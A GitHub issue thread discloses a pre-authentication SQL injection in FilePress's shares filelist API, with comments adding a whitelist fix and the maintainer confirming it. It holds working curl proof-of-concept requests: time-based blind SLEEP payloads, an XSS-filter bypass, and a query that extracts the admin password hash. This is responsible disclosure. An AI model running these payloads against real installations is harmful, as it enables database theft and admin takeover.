### ISSUE TITLE
[Security] Pre-Authentication SQL Injection in Shares filelist API

### ISSUE THREAD

**Issue by xiaohaiyang-ai** [zyx0814/Pichome#70]
## Summary

| Item                   | Details                                                      |
| ---------------------- | ------------------------------------------------------------ |
| **Vulnerability Type** | SQL Injection (CWE-89)                                       |
| **Severity**           | 🔴 Critical (CVSS 9.8)                                        |
| **Authentication**     | None Required (Pre-Auth)                                     |
| **Impact**             | Full database data exfiltration (including admin password hashes) |
| **Attack Vector**      | `GET /index.php?mod=shares&op=ajax&do=filelist&order=PAYLOAD` |
| **Affected Versions**  | All versions up to and including the latest release          |
| **Product**            | FilePress (based on DzzOffice/PicHome)                       |
| **Vendor**             | zyx0814                                                      |

---

## Description

A critical SQL injection vulnerability exists in the FilePress shares module `filelist` API endpoint. The `order` parameter is concatenated directly into the SQL `ORDER BY` clause without any whitelist validation or parameterization, allowing an unauthenticated attacker to inject arbitrary SQL expressions.

Combined with several bypasses of the application's built-in security mechanisms, an attacker can perform **time-based blind SQL injection** to extract arbitrary data from the database, including administrator credentials (username, password hash, and salt), without any prior authentication.

---

### Injection Point: `dzz/shares/ajax.php` (Lines 278-281)

**GitHub Link**: https://github.com/zyx0814/FilePress/blob/98cea990d06291fde12ab358e52b2b411ec89f7f/dzz/shares/ajax.php#L278-L281

```php
// dzz/shares/ajax.php:278-281
$order = isset($_GET['order']) ? trim($_GET['order']) : 'desc';
$orderby = isset($_GET['orderby']) ? trim($_GET['orderby']) : 'dateline';
if(!in_array($orderby, array('dateline'))) $orderby = 'dateline';
$ordersql = "order by $orderby $order";  // $order is NOT validated — direct concatenation
```

While `$orderby` is restricted to a whitelist (`dateline`), the `$order` parameter is only trimmed before being directly concatenated into the SQL query.

### Pre-condition: Unauthenticated Share Record Creation (`dzz/shares/ajax.php` Lines 229-260)

**GitHub Link**: https://github.com/zyx0814/FilePress/blob/98cea990d06291fde12ab358e52b2b411ec89f7f/dzz/shares/ajax.php#L229-L260

The `shareAddSubmit` action with `stype=3` allows anonymous users to create share records in the database (with `uid=0`). This is necessary to ensure the `filelist` query returns multiple rows, forcing MySQL to evaluate the `ORDER BY` expression (including side-effect functions like `SLEEP`).

```
GET /index.php?mod=shares&op=ajax&do=shareAddSubmit&title=test&stype=3&filepaths[]=1
```

#### 1. XSS Check (`_xss_check`) Bypass (`core/class/dzz/dzz_app.php` Lines 399-421)

**GitHub Link**: https://github.com/zyx0814/FilePress/blob/98cea990d06291fde12ab358e52b2b411ec89f7f/core/class/dzz/dzz_app.php#L399-L421

The application's XSS filter in `dzz_app.php` can be completely bypassed by using the `POST` method with a `formhash` parameter in the URL query string:

```php
// core/class/dzz/dzz_app.php:399-421
if($_SERVER['REQUEST_METHOD'] == 'GET') {
    $temp = $_SERVER['REQUEST_URI'];           // GET: URL is checked
} elseif(empty($_GET['formhash'])) {
    $temp = $_SERVER['REQUEST_URI'].'...';      // POST without formhash: checked
} else {
    $temp = '';  // POST + formhash in GET: check COMPLETELY SKIPPED
}
```

By sending a `POST` request with `formhash=bypass` in the URL, `$temp` becomes an empty string, bypassing all XSS checks. This allows the use of `>` and `<` comparison operators required for binary search extraction.

#### 2. QuerySafe Filter Bypass

The QuerySafe filter's function blocklist (`dfunction`) includes: `load_file, hex, substring, ord, char`.

The functions required for exploitation — `SLEEP`, `IF`, `MID`, `ASCII` — are **NOT** in the blocklist and can be used freely.

---

### Environment

- FilePress latest version (Docker deployment)
- MySQL 5.7 / 8.0
- PHP 7.x / 8.x

### Step 1: Create Share Records (No Authentication Required)

Send the following request 5-8 times to create multiple anonymous share records:

```bash
curl "http://TARGET/index.php?mod=shares&op=ajax&do=shareAddSubmit&title=test&stype=3&filepaths[]=1"
```

<img width="1603" height="849" alt="Image" src="https://github.com/user-attachments/assets/dbf35388-7fd7-4262-bc30-c0ca3bf54ac1" />

### Step 2: Verify the Injection Point

**Time-delay test** (expected ~3 second delay):

```bash
curl -X POST \
  "http://TARGET/index.php?mod=shares&op=ajax&do=filelist&order=ASC,(SELECT+1+FROM+(SELECT+IF(1=1,SLEEP(3),1))+t)&perpage=100&page=1&formhash=bypass" \
  -d ""
```

<img width="1570" height="861" alt="Image" src="https://github.com/user-attachments/assets/a38c14e8-6a34-4ef3-8cc1-5cee0db5ea30" />

**Control test** (expected immediate response):

```bash
curl -X POST \
  "http://TARGET/index.php?mod=shares&op=ajax&do=filelist&order=ASC,(SELECT+1+FROM+(SELECT+IF(1=2,SLEEP(3),1))+t)&perpage=100&page=1&formhash=bypass" \
  -d ""
```

If the first request takes ~3 seconds and the second returns immediately, the injection is confirmed.

### Step 3: Data Extraction (Example)

**Extract the first character of the database version:**

```bash
curl -X POST \
  "http://TARGET/index.php?mod=shares&op=ajax&do=filelist&order=ASC,(SELECT+1+FROM+(SELECT+IF(ASCII(MID(version(),1,1))>52,SLEEP(3),1))+t)&perpage=100&page=1&formhash=bypass" \
  -d ""
```

**Extract admin password hash (cross-table query):**

```
ORDER BY dateline ASC,(SELECT 1 FROM (SELECT IF(ASCII(MID((SELECT password FROM dzz_user WHERE uid=1 LIMIT 1),1,1))>100,SLEEP(3),1)) t)
```

Using binary search character-by-character extraction, the full 32-character MD5 password hash can be obtained in approximately 200-300 HTTP requests.

---

## Impact

1. **Administrator credential theft**: Extraction of admin username, password hash, and salt from the `dzz_user` table
2. **Full database compromise**: Cross-table extraction of any data (user records, configuration, attachment paths, etc.)
3. **Attack chain escalation**: Admin credentials can be used to log into the backend panel, enabling further exploitation (e.g., Remote Code Execution through plugin installation)

---

### 1. Whitelist `$order` Parameter (Highest Priority)

```php
$order = isset($_GET['order']) ? strtoupper(trim($_GET['order'])) : 'DESC';
if (!in_array($order, array('ASC', 'DESC'))) {
    $order = 'DESC';
}
```

### 2. Add Authentication to `filelist` API

The `filelist` endpoint should require user authentication and only return share data belonging to the authenticated user.

### 3. Add Authentication to `shareAddSubmit`

The `stype=3` share creation path should reject unauthenticated users (`uid=0`).

---

## Attack Flow

```
Step 1: shareAddSubmit (stype=3) — Create multiple uid=0 share records (no auth)
          |
          v
Step 2: POST method + formhash GET param — Bypass _xss_check filter
          |
          v
Step 3: ORDER BY IF(condition, SLEEP(N), 1) — Time-based blind SQLi oracle
          |
          v
Step 4: ASCII(MID(subquery, pos, 1)) > N — Binary search character extraction
          |
          v
Step 5: Extract admin username, password hash, salt from dzz_user table
```

---

## Timeline

| Date       | Event                                         |
| ---------- | --------------------------------------------- |
| 2026-04-21 | Vulnerability discovered and locally verified |
| 2026-04-21 | Report submitted to vendor via GitHub Issue   |

---

## References

- CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
- OWASP Top 10 2021 — A03: Injection

**Comment by jackieya** [comment]
Hi, I've submitted a fix for this vulnerability.

**PR**: https://github.com/jackieya/FilePress/compare/master...fix/sqli-order-param-sanitization

### Fix Details

Added `in_array()` whitelist validation for the `$order` parameter in both affected files, following the same pattern already used for `$orderby`:

```php
$order = isset($_GET['order']) ? trim($_GET['order']) : 'desc';
if(!in_array($order, array('desc', 'asc'))) $order = 'desc';  // ← Fix
```

**Files patched:**
- `dzz/shares/ajax.php`
- `dzz/shares/admin.php`

Minimal change (1 line per file), zero functional impact, no bypass possible.

**Comment by jackieya** [comment]
Updated the fix based on Copilot's review suggestions:

```php
$order = isset($_GET['order']) ? strtolower(trim($_GET['order'])) : 'desc';
if(!in_array($order, array('desc', 'asc'), true)) $order = 'desc';
```

Changes from initial version:
- Added `strtolower()` to normalize input (handles `ASC`/`DESC`/`Asc` variants)
- Added strict comparison (`true` as 3rd arg to `in_array()`) to prevent PHP type juggling

**Comment by zyx0814** [comment]
感谢@xiaohaiyang-ai
已修复
